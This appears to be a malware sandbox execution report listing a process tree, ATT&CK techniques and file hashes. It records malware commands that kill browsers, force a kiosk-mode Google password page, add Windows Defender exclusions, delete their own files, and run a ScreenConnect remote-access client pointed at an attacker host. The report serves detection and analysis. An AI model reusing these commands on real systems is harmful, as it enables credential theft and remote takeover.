- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:5468
-
-
C:\Users\Admin\AppData\Local\Temp\1017720001\249e4c4aa2.exe"C:\Users\Admin\AppData\Local\Temp\1017720001\249e4c4aa2.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:6024 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe /T6⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:8180
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM chrome.exe /T6⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:6040
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM msedge.exe /T6⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:8084
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM opera.exe /T6⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:6784
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM brave.exe /T6⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:6776
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking6⤵PID:7768
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking7⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:7820 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1984 -parentBuildID 20240401114208 -prefsHandle 1912 -prefMapHandle 1904 -prefsLen 23680 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {259fd1f0-3120-4e08-9075-c3c2fd197214} 7820 "\\.\pipe\gecko-crash-server-pipe.7820" gpu8⤵PID:5944
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2420 -parentBuildID 20240401114208 -prefsHandle 2388 -prefMapHandle 2384 -prefsLen 24600 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {aa0430d4-2017-4f5a-949b-f682ccd40cf5} 7820 "\\.\pipe\gecko-crash-server-pipe.7820" socket8⤵PID:3220
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3320 -childID 1 -isForBrowser -prefsHandle 3316 -prefMapHandle 3312 -prefsLen 22652 -prefMapSize 244658 -jsInitHandle 1260 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {16435867-3f6a-4ce8-ac51-25ae13b0f5cf} 7820 "\\.\pipe\gecko-crash-server-pipe.7820" tab8⤵PID:6580
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4184 -childID 2 -isForBrowser -prefsHandle 4176 -prefMapHandle 4172 -prefsLen 29090 -prefMapSize 244658 -jsInitHandle 1260 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {97a0911b-7572-480a-88ae-c7642a21677b} 7820 "\\.\pipe\gecko-crash-server-pipe.7820" tab8⤵PID:6292
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4632 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4752 -prefMapHandle 4628 -prefsLen 29090 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b8f19b53-8ef1-428f-81d5-1fc7c4ae0e84} 7820 "\\.\pipe\gecko-crash-server-pipe.7820" utility8⤵
- Checks processor information in registry
PID:6816
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5504 -childID 3 -isForBrowser -prefsHandle 4396 -prefMapHandle 5480 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 1260 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {96ec21ba-f8a6-4622-a6b3-61423aad92f7} 7820 "\\.\pipe\gecko-crash-server-pipe.7820" tab8⤵PID:2704
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5696 -childID 4 -isForBrowser -prefsHandle 5616 -prefMapHandle 5620 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 1260 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7dcaf644-162b-46bf-8e45-d737d194f3e4} 7820 "\\.\pipe\gecko-crash-server-pipe.7820" tab8⤵PID:788
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5840 -childID 5 -isForBrowser -prefsHandle 5788 -prefMapHandle 5784 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 1260 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {bdd47010-a6c7-49ee-8e4e-f6d08e510385} 7820 "\\.\pipe\gecko-crash-server-pipe.7820" tab8⤵PID:1268
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1017721001\7d7d379775.exe"C:\Users\Admin\AppData\Local\Temp\1017721001\7d7d379775.exe"5⤵
- Modifies Windows Defender Real-time Protection settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:6852
-
-
C:\Users\Admin\AppData\Local\Temp\1017722001\002e33e6e2.exe"C:\Users\Admin\AppData\Local\Temp\1017722001\002e33e6e2.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5440 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath "C:\ltphzo"6⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
PID:6600
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath "C:\ProgramData"6⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
PID:6156
-
-
C:\ltphzo\05e82532cd5649f38fb77710959e8897.exe"C:\ltphzo\05e82532cd5649f38fb77710959e8897.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Checks processor information in registry
PID:6784 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\ltphzo\05e82532cd5649f38fb77710959e8897.exe" & rd /s /q "C:\ProgramData\MOPHDT0HDJMY" & exit7⤵
- System Location Discovery: System Language Discovery
PID:956 -
C:\Windows\SysWOW64\timeout.exetimeout /t 108⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:5144
-
-
-
-
C:\ltphzo\f208f0109f4f4a50b3ac871d3afa2681.exe"C:\ltphzo\f208f0109f4f4a50b3ac871d3afa2681.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
PID:4480 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://apps.microsoft.com/store/detail/9MSZ40SLW145?ocid=&referrer=psi7⤵
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:7256 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffd4ca046f8,0x7ffd4ca04708,0x7ffd4ca047188⤵PID:6272
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2164,11495416741252563638,503844202153890009,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2188 /prefetch:28⤵PID:3984
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2164,11495416741252563638,503844202153890009,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2244 /prefetch:38⤵PID:5676
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2164,11495416741252563638,503844202153890009,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2888 /prefetch:88⤵PID:7188
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,11495416741252563638,503844202153890009,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3348 /prefetch:18⤵PID:6108
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,11495416741252563638,503844202153890009,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3364 /prefetch:18⤵PID:5276
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2164,11495416741252563638,503844202153890009,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5180 /prefetch:88⤵PID:5340
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2164,11495416741252563638,503844202153890009,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5180 /prefetch:88⤵PID:8128
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,11495416741252563638,503844202153890009,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5184 /prefetch:18⤵PID:5124
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,11495416741252563638,503844202153890009,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4888 /prefetch:18⤵PID:4712
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,11495416741252563638,503844202153890009,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5572 /prefetch:18⤵PID:6684
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,11495416741252563638,503844202153890009,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5104 /prefetch:18⤵PID:6288
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1017723001\8e6fdcba59.exe"C:\Users\Admin\AppData\Local\Temp\1017723001\8e6fdcba59.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:6552 -
C:\Users\Admin\AppData\Local\Temp\1017723001\8e6fdcba59.exe"C:\Users\Admin\AppData\Local\Temp\1017723001\8e6fdcba59.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:6576
-
-
-
C:\Users\Admin\AppData\Local\Temp\1017724001\7d3ca92efa.exe"C:\Users\Admin\AppData\Local\Temp\1017724001\7d3ca92efa.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:6048
-
-
C:\Users\Admin\AppData\Local\Temp\1017725001\1e12196e13.exe"C:\Users\Admin\AppData\Local\Temp\1017725001\1e12196e13.exe"5⤵
- Enumerates VirtualBox registry keys
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:6096
-
-
C:\Users\Admin\AppData\Local\Temp\1017726001\5f7c680e81.exe"C:\Users\Admin\AppData\Local\Temp\1017726001\5f7c680e81.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:2024 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵PID:7364
-
-
C:\Users\Admin\AppData\Local\Temp\1017726001\5f7c680e81.exe"C:\Users\Admin\AppData\Local\Temp\1017726001\5f7c680e81.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5160 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5160 -s 13207⤵
- Program crash
PID:7792
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5160 -s 12807⤵
- Program crash
PID:6492
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1017727001\1343a45d10.exe"C:\Users\Admin\AppData\Local\Temp\1017727001\1343a45d10.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:6108
-
-
C:\Users\Admin\AppData\Local\Temp\1017728001\cedb729c19.exe"C:\Users\Admin\AppData\Local\Temp\1017728001\cedb729c19.exe"5⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:4712 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4712 -s 5686⤵
- Program crash
PID:5396
-
-
-
C:\Users\Admin\AppData\Local\Temp\1017729001\772e9249c7.exe"C:\Users\Admin\AppData\Local\Temp\1017729001\772e9249c7.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:6792 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath "C:\ffhkiyxgou"6⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
PID:6452
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath "C:\ProgramData"6⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
PID:4932
-
-
C:\ffhkiyxgou\6255b429668f48439480e235dec40213.exe"C:\ffhkiyxgou\6255b429668f48439480e235dec40213.exe"6⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:216
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1007463001\b8f9100a83.exe"C:\Users\Admin\AppData\Local\Temp\1007463001\b8f9100a83.exe"3⤵
- Enumerates VirtualBox registry keys
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:860
-
-
-
C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exeC:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:3144
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 2344 -ip 23441⤵PID:64
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Boot or Logon Autostart Execution: Authentication Package
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5000 -
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 72D43A1845FD982E37091DC9B2F78D1E C2⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2432 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\MSI3208.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_240661156 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments3⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:3612
-
-
-
C:\Windows\system32\srtasks.exeC:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:22⤵PID:6896
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding BFEE017D5D4E35617306AB7D8378F6B72⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:6356
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 932AE2787C83DCAF2C721A7B4B1A9E60 E Global\MSI00002⤵
- Loads dropped DLL
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:7180
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Checks SCSI registry key(s)
PID:3804
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:3112
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:5164
-
C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\ScreenConnect.ClientService.exe"C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=gips620.top&p=8880&s=63cce5c8-c673-4e2f-98ce-7ae714cc43a6&k=BgIAAACkAABSU0ExAAgAAAEAAQDpOwIVy34yVx7xLDnH6rBeYx7mmiLN2yQyIYdJTxYIVHOsytxx89D0YKoH68EoEXToTuDpMmwJb%2bhrlJ3faNFTpvu7W8w3%2fxYUdeWuXWg%2bTQxXr6EWby912nykdroWfBxDx6Lmxg1gxGgRJHC8Oc96zV%2fiaqo5GlyagtszKkrbPOWW4FBVQPXhlUfH4mlFE0i0vcMxGginTYl8IjGBzr94ANeAXwajoe9Cjam2haoL%2f%2bgHMtFYBZJisALFnyX3zECpRv7vqWzNAQJYIqY6qDuC2lEbs0NtuBMSfQRW1t0ZOk7cEzuQjq72QbWf1bR8rZf%2b0t3VNSgkIUcBljvpSRK7&c=VIRUS101&c=https%3a%2f%2ft.me%2fvirus101Screenconnect&c=PC%20RAT&c=PC%20RAT&c=&c=&c=&c="1⤵
- Sets service image path in registry
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:6560 -
C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\ScreenConnect.WindowsClient.exe"C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\ScreenConnect.WindowsClient.exe" "RunRole" "e592bc8f-b1a4-4998-bb74-688dcbaf4ad7" "User"2⤵
- Executes dropped EXE
PID:6844
-
-
C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\ScreenConnect.WindowsClient.exe"C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\ScreenConnect.WindowsClient.exe" "RunRole" "8097b48e-1037-410f-bb0a-43926bcf885e" "System"2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Checks processor information in registry
- Modifies data under HKEY_USERS
PID:6476
-
-
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exeC:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:7808
-
C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exeC:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:6660
-
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exeC:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:7192 -
C:\Windows\explorer.exeexplorer.exe2⤵PID:6340
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe2⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:6532 -
C:\Windows\system32\PING.EXE"C:\Windows\system32\PING.EXE" 127.1.10.13⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:5668
-
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:8056
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:8180
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 4712 -ip 47121⤵PID:3648
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 5160 -ip 51601⤵PID:2632
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 5160 -ip 51601⤵PID:4156
-
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exeC:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:7316
-
C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exeC:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5392
-
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exeC:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:7272 -
C:\Windows\explorer.exeexplorer.exe2⤵PID:456
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe2⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:6696 -
C:\Windows\system32\PING.EXE"C:\Windows\system32\PING.EXE" 127.1.10.13⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:7412
-
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
3Authentication Package
1Registry Run Keys / Startup Folder
2Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Component Object Model Hijacking
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
3Authentication Package
1Registry Run Keys / Startup Folder
2Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Component Object Model Hijacking
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Hide Artifacts
1Hidden Files and Directories
1Impair Defenses
2Disable or Modify Tools
2Modify Registry
4Virtualization/Sandbox Evasion
3Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
5Credentials In Files
5Discovery
Browser Information Discovery
1Peripheral Device Discovery
2Query Registry
11Remote System Discovery
1System Information Discovery
7System Location Discovery
1System Language Discovery
1System Network Configuration Discovery
1Internet Connection Discovery
1Virtualization/Sandbox Evasion
3Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
214KB
MD5f77d8c74f99ec80cb7c96c5a6b92b261
SHA1a23c9451de4de684502a684d4880abdf911064a2
SHA256a019011f302de18a7d1f4b2cf34ae117ee00166c732d4f83bf00d7f256be1159
SHA51208c7672798fa92eaf68af9c61411a13286341625fa26e923f57f41f8cc8c2fcb46b2538f9f1682660eda576a4306c139f9c5404b58fe2d2465b513ed8e74ec2a
-
Filesize
2KB
MD5968cb9309758126772781b83adb8a28f
SHA18da30e71accf186b2ba11da1797cf67f8f78b47c
SHA25692099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
SHA5124bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3
-
Filesize
152B
MD558ffc60f16e2cc5f57693a21a9b6bee2
SHA11c89779940df6c4fedbb59a99687990c45015266
SHA2562f591b201f1603f3847d9d992c01d3e365ab99fbd4981dd9fc8b019f004a212f
SHA512ac31dd656373abb4cb59624f1f68808ec02748a64613c82bc5b6eefe9c1b9c70a28b95174c8bed36e479dfe6c66bb7b9fbd8fa2d018645332f79c69d1895f4d5
-
Filesize
152B
MD561cef8e38cd95bf003f5fdd1dc37dae1
SHA111f2f79ecb349344c143eea9a0fed41891a3467f
SHA256ae671613623b4477fbd5daf1fd2d148ae2a09ddcc3804b2b6d4ffcb60b317e3e
